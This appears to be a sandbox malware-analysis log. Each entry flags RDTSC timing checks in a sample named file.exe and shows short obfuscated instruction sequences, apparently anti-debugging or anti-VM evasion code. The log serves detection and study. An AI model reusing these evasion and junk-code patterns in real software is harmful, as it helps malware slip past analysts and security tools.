Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631BF3 second address: 631BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631BF9 second address: 631C58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F45A84F32FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F45A84F3316h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F45A84F3306h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jng 00007F45A84F32F6h 0x00000021 jc 00007F45A84F32F6h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631F84 second address: 631F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632066 second address: 63206A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632FBE second address: 632FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6339CC second address: 6339D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F45A84F32FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632FC2 second address: 632FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632FC8 second address: 632FF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45A84F32FAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnl 00007F45A84F330Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45A84F32FDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632FF0 second address: 632FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634DBC second address: 634DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 clc 0x00000008 movzx esi, cx 0x0000000b push 00000000h 0x0000000d sub edi, dword ptr [ebp+122D2C2Bh] 0x00000013 mov esi, dword ptr [ebp+122D2A10h] 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2560h], edx 0x00000021 xchg eax, ebx 0x00000022 jns 00007F45A84F32FEh 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634DF2 second address: 634DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634DF6 second address: 634E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F45A84F32F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635852 second address: 635857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636431 second address: 636435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635598 second address: 63559C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636435 second address: 63644A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F45A84F3304h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63644A second address: 63644E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6364D1 second address: 6364DB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6364DB second address: 6364E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63618A second address: 6361A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F45A84F32FDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637A5E second address: 637A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A409 second address: 63A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A40D second address: 63A484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F45A8838C7Fh 0x0000000d nop 0x0000000e call 00007F45A8838C89h 0x00000013 movzx ebx, ax 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 call 00007F45A8838C86h 0x0000001e call 00007F45A8838C85h 0x00000023 or ebx, 75E0C22Ah 0x00000029 pop ebx 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d stc 0x0000002e push eax 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 jns 00007F45A8838C76h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638290 second address: 638294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C29B second address: 63C29F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63D283 second address: 63D2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F45A84F32F8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov ebx, dword ptr [ebp+122D2CACh] 0x0000002a push 00000000h 0x0000002c movsx edi, dx 0x0000002f push eax 0x00000030 pushad 0x00000031 push ecx 0x00000032 jmp 00007F45A84F3305h 0x00000037 pop ecx 0x00000038 pushad 0x00000039 je 00007F45A84F32F6h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E17C second address: 63E18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C7Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E18C second address: 63E196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63D3F8 second address: 63D486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F45A8838C7Ch 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F45A8838C85h 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D32BFh], ebx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D1D09h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 je 00007F45A8838C7Ch 0x00000036 mov ebx, dword ptr [ebp+122D2898h] 0x0000003c jns 00007F45A8838C82h 0x00000042 mov eax, dword ptr [ebp+122D0B21h] 0x00000048 mov bh, cl 0x0000004a mov edi, 65999DF5h 0x0000004f push FFFFFFFFh 0x00000051 mov ebx, dword ptr [ebp+122D2968h] 0x00000057 nop 0x00000058 jc 00007F45A8838C84h 0x0000005e push eax 0x0000005f push edx 0x00000060 jg 00007F45A8838C76h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E196 second address: 63E19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63D486 second address: 63D49B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jc 00007F45A8838C76h 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63F356 second address: 63F366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F32FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63F366 second address: 63F36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63F36A second address: 63F3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+122D3714h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F45A84F32F8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov ebx, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F45A84F32F8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jno 00007F45A84F330Dh 0x0000004f push eax 0x00000050 pushad 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 640565 second address: 640579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45A8838C7Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 640579 second address: 6405A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45A84F3306h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642401 second address: 642407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642544 second address: 64254F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45A84F32F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64254F second address: 642555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64462D second address: 644641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642555 second address: 642559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642559 second address: 64255D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 645519 second address: 64551D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64551D second address: 645521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64653A second address: 646540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 645521 second address: 645527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 645527 second address: 64552C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64552C second address: 645556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F45A84F3309h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647585 second address: 64758F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652D7C second address: 652D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6524E3 second address: 6524EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45A8838C78h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6524EF second address: 652508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F3305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652508 second address: 65250C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 657913 second address: 657917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 657917 second address: 65791D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CE7B second address: 65CE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C13C second address: 65C141 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C28A second address: 65C2B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F45A84F32F8h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F45A84F32F6h 0x0000001b jmp 00007F45A84F3303h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C2B8 second address: 65C2C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C2C1 second address: 65C2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C2C7 second address: 65C2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45A8838C87h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C846 second address: 65C850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CA0B second address: 65CA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CA0F second address: 65CA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CA13 second address: 65CA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C7Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F45A8838C86h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jc 00007F45A8838C76h 0x0000001a jnc 00007F45A8838C76h 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CA4B second address: 65CA61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F45A84F32F6h 0x00000009 je 00007F45A84F32F6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65CBC0 second address: 65CBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660484 second address: 66048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7005 second address: 5F7018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F45A8838C7Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7018 second address: 5F703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F32FEh 0x00000009 jmp 00007F45A84F3305h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F703F second address: 5F7043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663F60 second address: 663F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668A59 second address: 668AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C84h 0x00000009 jne 00007F45A8838C76h 0x0000000f popad 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pushad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d jne 00007F45A8838C76h 0x00000023 jmp 00007F45A8838C7Fh 0x00000028 pop esi 0x00000029 pushad 0x0000002a jnp 00007F45A8838C76h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668BE1 second address: 668C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F45A84F32FDh 0x0000000c jc 00007F45A84F32F8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F45A84F3300h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007F45A84F32F8h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668741 second address: 668771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C85h 0x00000007 jmp 00007F45A8838C87h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668771 second address: 668794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3306h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F45A84F32F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669482 second address: 66949F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F45A8838C76h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66949F second address: 6694A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66F46F second address: 66F473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66F473 second address: 66F477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F92C second address: 62F933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FCDE second address: 62FCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FD9E second address: 62FDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FED9 second address: 62FEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FEDE second address: 62FEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FEE8 second address: 62FF1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F45A84F32FDh 0x00000011 stc 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FF1D second address: 62FF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FF21 second address: 62FF2B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FF2B second address: 62FF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630023 second address: 630029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630029 second address: 63002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63002D second address: 63003D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630103 second address: 630107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6301B3 second address: 6301CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6301CB second address: 6301E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6301E2 second address: 6301E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
